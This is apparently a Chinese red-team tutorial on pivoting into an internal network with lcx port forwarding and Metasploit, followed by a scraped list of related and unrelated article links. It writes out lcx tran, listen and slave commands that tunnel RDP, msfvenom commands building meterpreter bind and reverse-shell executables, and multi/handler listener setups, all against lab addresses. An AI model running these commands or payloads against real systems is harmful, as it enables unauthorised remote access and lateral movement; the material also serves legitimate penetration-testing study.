目录

0x01 正向端口转发

0x02 反向端口转发

0x03 msf正向shell

0x04 msf反向shell

注:

边界机器 win08 192.168.222.175

内网机器 win7 192.168.222.137

msf机器 Ubuntu 192.168.222.177

0x01 正向端口转发

在边界机器上执行端口转发命令,让来自指定端口的流量全部转发到内网指定IP指定端口上。

这里关闭了防火墙,在正常情况下请使用netsh来对端口进行开放,详细步骤可以参考以前的文章【使用netsh来进行端口转发

这里我们将本地53端口的全部流量都转发到内网机器的3389端口,从而进行远程连接

lcx.exe -tran 53 192.168.222.137 3389

当然在执行完之后,我们再确定一下端口是否已经启用

然后我们在本地来进行远程连接

0x02 反向端口转发

如果我们只有当前目标的webshell,并没有边界主机可以利用的话,就可以通过反向端口转发来使内网流量都转发到自己的主机上。

注:这里我们用边界机器win08来代替我们的本地主机

首先在本地机器执行监听

lcx.exe -listen 53 1234

使用netstat -ano 确保端口已经启用

然后在目标机器(win7)上执行

lcx.exe -slave 192.168.222.175 53 127.0.0.1 3389

即将本地3389端口的流量都转发到win8机器的53端口上,如果有边界服务器可以利用的话,则在边界服务器执行该命令,将对应的IP和端口改变就可以了。

然后在本地(win8)远程连接即可

0x03 msf正向shell

使用lcx执行正向端口转发,去连接内网的meterpreter

首先先用msf生成一个马

msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe

然后去边界机器执行lcx的正向端口转发,将来自53端口的流量全部转发到内网的meterpreter上

lcx.exe -tran 53 192.168.222.137 53

然后去内网机器运行我们的马

再回到Ubuntu上,对其进行监听,监听边界机器的53端口即可

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 53
set rhost 192.168.222.175
run

0x04 msf反向shell

反向shell也是一样的道理

首先先生成我们的马,这里回连的IP和端口都是边界机器的

msfvenom -p windows/x64/meterpreter/reverse_tcp lport=53 lhost=192.168.222.175  -f exe >> 123.exe

然后到边界机器上执行监听

lcx.exe -listen 53 8888

到内网机器执行我们的马

回到Ubuntu上,对其进行监听

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lhost 192.168.222.175
set lport 8888
exploit -j

可见第一次并没有成功弹回session,这个使由于lcx的原因,多尝试两次就可以了

文章首发公众号:无心的梦呓(wuxinmengyi)

这是一个记录红队学习、信安笔记,个人成长的公众号

扫码关注即可

lcx端口转发的更多相关文章

  1. LCX端口转发实现内网突破

    工具:lcx.exe 原理:当目标主机仅开放了web服务,而该服务又仅能供内网用户使用,外网用户根本无法直接访问.因此想要让外网用户能能够访问局域网中的系统服务,必须进行端口映射等操作才行.其原理就是 ...

  2. lcx端口转发 linux版

    一.端口转发使用 1.攻击机上执行以下命令 ./lcx -p1 -p2 -m 在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口 2.跳板机上执行以下命令 ./lcx -h ...

  3. lcx 端口转发

    1.查看3389端口开放情况: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStati ...

  4. [内网渗透]lcx端口转发

    0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上 第二个功能将本地端口转发到本地另一个端口上 第三个功能是进行监听并进行转发使用 Lcx使用的前提是 ...

  5. linux下内网端口转发工具:linux版lcx [实现远程内网维护]

    这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I ...

  6. 端口转发 Port Forwarding (一)

    0x00First 最近发现一些好用的端口转发工具和技巧,计划认真梳理一下 SSH.NC.LCX.EW.FRP 0x01 SSH隧道端口转发 目前利用SSH隧道(SSH tunneling)进行端口转 ...

  7. 端口转发工具lcx使用两类

    lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口.它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入 ...

  8. [转]otunnel:一个和lcx差不多的端口转发的工具

    这是一个采用Golang编写的和lcx差不多的端口转发的工具,用来突破内网环境 项目地址 ooclab/otunnel 下载地址(内涵各大平台) http://dl.ooclab.com/otunne ...

  9. LCX端口内网映射转发

    这几天在渗透一家奶茶店的时候, 使用溢出攻击获得了奶茶店shell, 截屏以后发现该电脑有安装sqlserver, 但是数据库无法远程连接, 所以我决定使用端口映射工具突破端口连接限制: 我的机器地址 ...

随机推荐

  1. Egret白鹭开发微信小游戏(使用皮肤搭建UI,代码调用组件功能)

    (1)新建皮肤,并命名如下 (2)根据实际情况自定义皮肤,例如: (3)修改名字为如下: (4)运行游戏会自动生成以下代码: (5)在default.thm.json中添加如下代码:(具体路径名字根据 ...

  2. CocosCreator上的游戏(调试)发布到微信小程序

    1.下载CocosCreator,微信开发者工具 官网地址:http://www.cocos.com/download 官网下载:https://developers.weixin.qq.com/mi ...

  3. HDU 6059

    题意略. 思路:我们要想令 A[i] ^ A[j] < A[j] ^ A[k](i < j < k),由于A[i]和A[k]都要 ^ A[j],所以我们只需研究一下i,k这两个数之间 ...

  4. STL中的map和multimap小结

    (1)使用map/multimap之前必须包含头文件<map>:#include<map> 并且和所有的关联式容器一样,map/multimap通常以平衡二叉树来完成    ( ...

  5. CodeForces 1084 F Max Mex

    Max Mex 题意:问在树上的所有路中mex值最大是多少. 题解: 用线段树维护值. 区间[L,R]意味着 区间[L,R]的数可不可以合并. 重点就是合并的问题了. 首先合法的区间只有3种: 1. ...

  6. 牛客多校第五场 E room 二分图匹配 KM算法模板

    链接:https://www.nowcoder.com/acm/contest/143/E来源:牛客网 Nowcoder University has 4n students and n dormit ...

  7. Taro框架下qq小程序开发体验

    qq小程序发布了,作为第一批体验者 .还是发现了和微信小程序很多不同的地方. 最新的小程序我这里都是用Taro开发的,体验较为不错.数据管理用的是redux.JS用的ES6加async等. 微信小程序 ...

  8. webpack4 公共模块打包,怎么抽取出来一个需要经常修改的包

    项目中有一个需求: 所有页面引用了一个公共ad.js 因为广告需要不断投放新渠道,所以ad.js需要经常上线更新,这样会导致打包出来的 commons.js经常更新,缓存一下无效了.所以急需将ad.j ...

  9. [DP]最长递增子序列

    #include <iostream> #include <limits.h> #include <vector> #include <algorithm&g ...

  10. 实现 Java 本地缓存,该从这几点开始

    缓存,我相信大家对它一定不陌生,在项目中,缓存肯定是必不可少的.市面上有非常多的缓存工具,比如 Redis.Guava Cache 或者 EHcache.对于这些工具,我想大家肯定都非常熟悉,所以今天 ...